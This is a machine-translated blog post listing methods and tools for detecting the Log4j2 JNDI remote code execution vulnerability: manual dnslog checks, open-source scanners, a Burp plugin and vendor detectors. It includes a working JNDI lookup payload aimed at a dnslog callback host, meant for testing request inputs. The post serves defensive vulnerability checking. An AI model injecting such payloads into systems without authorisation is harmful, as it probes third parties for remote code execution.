当前位置:网站首页>Log4j2 vulnerability detection tool list
Log4j2 vulnerability detection tool list
2022-06-25 20:19:00 【Bypass--】
distance Log4j2 It's been a month since the vulnerability was exposed , The serious impact it has caused does not need to be mentioned again . as time goes on , New vulnerabilities will continue to emerge , Old loopholes will continue to disappear , And this Log4j2 Medium RCE Vulnerabilities can take years to resolve . therefore , In the next period of time , This loophole is still the focus we need to pay attention to .
This paper collects and sorts out several vulnerability detection methods and tools , For use Log4j2 Vulnerability detection and self inspection .
1、dnslog Manual verification method
First, in the dnslog The platform obtains a subdomain name , Try to construct payload, Insert request packet .
${jndi:ldap://bypass.fzuqgl.ceye.io}
adopt dnslog Whether the platform receives the request , Preliminarily judge whether there are loopholes in the target environment .
2、Log4j-scan
One for finding log4j2 Loopholes python Script , Support url testing , Support HTTP Request the head and POST Fuzzy test of data parameters .
github Project address :
https://github.com/fullhunt/log4j-scan
3、Log4j2 burp Passive scanning plug-in
Through plug-ins , take lLog4j2 Vulnerability detection capabilities are integrated into burp, So as to improve the vulnerability detection ability of security testers .
github Project address :
https://github.com/f0ng/log4j2burpscanner
Log4j2 burp Passive scanning plug-in effect :
4、AWVS scanning log4j2 Loophole
AWVS14 Latest version support Log4j2 Vulnerability detection , Support batch scanning , Vulnerability scanning artifact won't let you down , Get ready to update the Arsenal .
5、 Product grade Log4j2 Vulnerability detection tools
This testing tool is based on Tencent security binAuditor, Support Jar/Ear/War Package upload , One click upload to get the test results .
Detection address :
https://bsca.ms.qq.com/
Jar Packet test results :
6、Log4j2 Local detection tools
Extracted from Changting Muyun products Log4j2 Local detection tools , It can quickly discover the risk of the current server log4j2 application .
Log4j2 Vulnerability detection tool address :
https://log4j2-detector.chaitin.cn/
7、360 Log4j2 Test kit
Browser passive scanning + Local detection tools , Provides a complete Log4j2 Vulnerability detection scheme , in addition , The toolkit also includes Log4j2 Patch scheme , Here's the picture :
边栏推荐
- Uniapp waterfall flow, applet waterfall flow, very simple, suitable for the whole platform
- Jsonp function encapsulation
- App battery historian master
- PAT B1056
- PAT B1096
- TypeError: __ init__ () takes 1 positional argument but 5 were given
- Arduino ide + esp8266+mqtt subscribe to publish temperature and humidity information
- JS forest leaf node non recursive depth first postorder traversal
- I Space distributor
- 200 OK (from memory cache) and 200 OK (from disk cache)
猜你喜欢
Teach you how to add custom controls to a map
Leetcode daily question - 27 Remove element (simple)
One picture to achieve the selected effect
Swin UNET reading notes
[harmonyos] [arkui] how can Hongmeng ETS call pa
Hdoj topic 2005 day
H5 application conversion fast application
<C>. function
5 minutes to learn how to install MySQL
SQL statement select summary
随机推荐
PAT B1059
Modifying routes without refreshing the interface
4.ypthon function foundation
Pdf file download (the download name is the same as the file name)
TypeError: __ init__ () takes 1 positional argument but 5 were given
Png to NII
The functions in the applet page are better than those in app JS first execution solution
JS advanced
Corporate finance formula_ P1_ Accounting statement and cash flow
Is it safe to open an account with a mobile phone? Where can I open an account to buy shares?
II Traits (extractors)
Life cycle function of composite API
My official account writing experience sharing
<C>. array
2.14(Knight Moves)
206. reverse linked list (insert, iteration and recursion)
200 OK (from memory cache) and 200 OK (from disk cache)
Arduino : No such file or directory
Wechat applet swiper simple local picture display appears large blank
III Implementation principle of vector